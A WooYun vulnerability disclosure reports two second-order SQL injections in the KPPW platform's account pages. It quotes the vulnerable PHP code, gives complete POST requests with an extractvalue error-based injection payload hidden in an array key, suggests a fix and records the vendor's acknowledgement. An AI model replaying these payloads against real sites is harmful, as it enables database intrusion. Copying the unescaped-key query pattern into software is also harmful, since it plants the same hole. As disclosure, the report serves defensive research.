当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141694

漏洞标题:kppw最新版2处sql注入。

相关厂商:keke.com

漏洞作者: %270x5c

提交时间:2015-10-07 09:25

修复时间:2016-01-11 15:36

公开时间:2016-01-11 15:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-11: 厂商已经确认,细节仅向厂商公开
2015-10-14: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-05: 细节向核心白帽子及相关领域专家公开
2015-12-15: 细节向普通白帽子公开
2015-12-25: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

二次注入。

详细说明:

#1
/www/control/user/account_basic.php

.....
$arrMemberExts = kekezu::get_table_data ( "*", "witkey_member_ext", " type='sect' and uid= ".$gUid, "", "", "", "k" );
........
if ($sect) {
			foreach ( $sect as $k => $v ) {
				if ($arrMemberExts [$k])
					db_factory::execute ( sprintf ( " update %switkey_member_ext set v1='%s' where k='%s' and uid='%d'", TABLEPRE, $v, $k, $gUid ) );
				else {
					$ext_obj = new Keke_witkey_member_ext_class ();
					$ext_obj->setK ( $k );
					$ext_obj->setV1 ( kekezu::escape ( $v ) );
					$ext_obj->setUid ( $gUid );
					$ext_obj->setType ( 'sect' );
					$ext_obj->create_keke_witkey_member_ext ();
				}
			}
		}


跟到create_keke_witkey_member_ext()

function create_keke_witkey_member_ext(){
		 		 $data =  array(); 
					if(!is_null($this->_ext_id)){ 
				 $data['ext_id']=$this->_ext_id;
			}
			if(!is_null($this->_uid)){ 
				 $data['uid']=$this->_uid;
			}
			if(!is_null($this->_k)){ 
				 $data['k']=$this->_k;
			}
			if(!is_null($this->_v1)){ 
				 $data['v1']=$this->_v1;
			}
			if(!is_null($this->_v2)){ 
				 $data['v2']=$this->_v2;
			}
			if(!is_null($this->_v3)){ 
				 $data['v3']=$this->_v3;
			}
			if(!is_null($this->_v4)){ 
				 $data['v4']=$this->_v4;
			}
			if(!is_null($this->_v5)){ 
				 $data['v5']=$this->_v5;
			}
			if(!is_null($this->_type)){ 
				 $data['type']=$this->_type;
			}
			 return $this->_ext_id = $this->_db->inserttable($this->_tablename,$data,1,$this->_replace); 
		 }


对于 post传入的 sect数组,先判断其键是否存在,存在则update,不存在就insert。
这里就出问题了,如果我们先提交sect[1'] 会insert values('1\'')
再重复提交一次的话, 就会进入update了,单引号就带进来了。
注册用户,
index.php?do=user&view=account&op=basic
post两次数据:

formhash=00a201&pk%5Buid%5D=10&is_perfect=1&indus_pid=-1&indus_id=-1&truename=%E5%98%89%E5%AE%A2&sex=-1&birthday=2015-09-09&email=a%**.**.**.**&sect%5Bemail%5D=1&mobile=18615478859&sect%5B1'and extractvalue(1,concat(0x5c,user()))#%5D=12222&qq=123213213&sect%5Bqq%5D=1&msn=&sect%5Bmsn%5D=1&phone=&sect%5Bphone%5D=1&province=p&city=c&area=a


11.png


#2
/www/control/user/account_contact.php

if($gUserInfo['city']){
	$arrCity = CommonClass::getDistrictByPid($gUserInfo['province'],'id,upid,name');
}
if($gUserInfo['area']){
	$arrArea = CommonClass::getDistrictByPid($gUserInfo['city'],'id,upid,name');
}
if (isset($formhash)&&kekezu::submitcheck($formhash)) {
	if($gUserInfo['uid'] != $pk['uid']){
		kekezu::show_msg('无权操作',NULL,NULL,NULL,'error');
		return false;
	}
	$arrData =array(
		'email'	=>$email,
		'mobile'=>$mobile,
		'qq'	=>$qq,
		'msn'	=>$msn,
		'phone'	=>$phone,
		'province'=>$province,
		'city'=>$city,
		'area'=>$area
	);
	$intRes = $objSpaceT->save($arrData,$pk);
	if ($sect) {
		foreach ( $sect as $k => $v ) {
			if ($arrMemberExts [$k])
				db_factory::execute ( sprintf ( " update %switkey_member_ext set v1='%s' where k='%s' and uid='%d'", TABLEPRE, $v, $k, $gUid ) );
			else {
				$ext_obj = new Keke_witkey_member_ext_class ();
				$ext_obj->setK ( $k );
				$ext_obj->setV1 ( kekezu::escape ( $v ) );
				$ext_obj->setUid ( $gUid );
				$ext_obj->setType ( 'sect' );
				$ext_obj->create_keke_witkey_member_ext ();
			}
		}


前面的条件全满足即可注入。
/index.php?do=user&view=account&op=contact
post:

formhash=01b251&pk%5Buid%5D=10&is_perfect=1&indus_pid=-1&indus_id=-1&truename=%E5%98%89%E5%AE%A2&sex=-1&birthday=2015-09-09&email=a%**.**.**.**&sect%5Bemail%5D=1&mobile=18615478859&sect%5B1'and extractvalue(1,concat(0x5c,user()))#%5D=12222&qq=123213213&sect%5Bqq%5D=1&msn=&sect%5Bmsn%5D=1&phone=&sect%5Bphone%5D=1&province=p&city=c&area=a


11.png


漏洞证明:

11.png


11.png

修复方案:

判断键是否合法,update时 再转义下

版权声明:转载请注明来源 %270x5c@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-10-11 16:21

厂商回复:

感谢您的关注和支持,我们会尽快修复

最新状态:

暂无